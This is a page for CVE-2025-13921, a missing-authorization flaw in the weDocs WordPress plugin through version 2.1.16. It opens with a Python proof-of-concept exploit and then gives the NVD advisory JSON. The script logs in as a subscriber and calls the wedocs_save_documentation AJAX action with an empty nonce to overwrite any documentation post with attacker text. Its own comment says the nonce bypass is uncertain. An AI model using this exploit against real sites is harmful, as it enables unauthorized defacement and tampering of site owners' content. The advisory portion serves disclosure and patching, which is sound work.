CVE-2025-13921

import requests import sys # CVE-2025-13921 PoC - weDocs Plugin Unauthorized Documentation Edit # Target: WordPress site with weDocs plugin <= 2.1.16 TARGET_URL = "http://target-wordpress-site.com" USERNAME = "subscriber_user" PASSWORD = "user_password" TARGET_DOC_ID = 123 # ID of the documentation to edit def exploit(): # Step 1: Login to WordPress session = requests.Session() login_url = f"{TARGET_URL}/wp-login.php" login_data = { 'log': USERNAME, 'pwd': PASSWORD, 'wp-submit': 'Log In', 'redirect_to': '/wp-admin/', 'testcookie': '1' } resp = session.post(login_url, data=login_data) if 'wordpress_logged_in' not in str(session.cookies): print("[-] Login failed") return False print("[+] Login successful as subscriber") # Step 2: Exploit the missing authorization check # The wedocs_user_documentation_handling_capabilities function # does not verify if user has permission to edit the target doc exploit_url = f"{TARGET_URL}/wp-admin/admin-ajax.php" exploit_data = { 'action': 'wedocs_save_documentation', 'doc_id': TARGET_DOC_ID, 'doc_title': 'Hacked by Attacker', 'doc_content': 'Malicious content injected', 'nonce': '' # May be missing or bypassable } resp = session.post(exploit_url, data=exploit_data) if resp.status_code == 200: print(f"[+] Successfully modified documentation ID: {TARGET_DOC_ID}") print("[+] Vulnerability confirmed - Missing authorization check exploited") return True else: print(f"[-] Exploitation failed: {resp.status_code}") return False if __name__ == "__main__": exploit()

{"cve": {"id": "CVE-2025-13921", "sourceIdentifier": "[email protected]", "published": "2026-01-23T14:16:12.663", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki & AI Chatbot plugin for WordPress is vulnerable to unauthorized modification or loss of data due to a missing capability check on the 'wedocs_user_documentation_handling_capabilities' function in all versions up to, and including, 2.1.16. This makes it possible for authenticated attackers, with Subscriber-level access and above, to edit any documentation post. The vulnerability was partially patched in version 2.1.16."}, {"lang": "es", "value": "El plugin weDocs: AI Powered Knowledge Base, Docs, Documentation, Wiki &amp; AI Chatbot para WordPress es vulnerable a la modificación o pérdida de datos no autorizada debido a una falta de verificación de capacidad en la función 'wedocs_user_documentation_handling_capabilities' en todas las versiones hasta la 2.1.16, inclusive. Esto hace posible que atacantes autenticados, con acceso de nivel Suscriptor y superior, editen cualquier publicación de documentación. La vulnerabilidad fue parcheada parcialmente en la versión 2.1.16."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/Installer.php#L21", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/browser/wedocs/tags/2.1.14/includes/functions.php#L506", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3426704/", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset/3440068/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/c56234f3-7dd6-4dff-887d-5ddbf0cb7d3c?source=cve", "source": "[email protected]"}]}}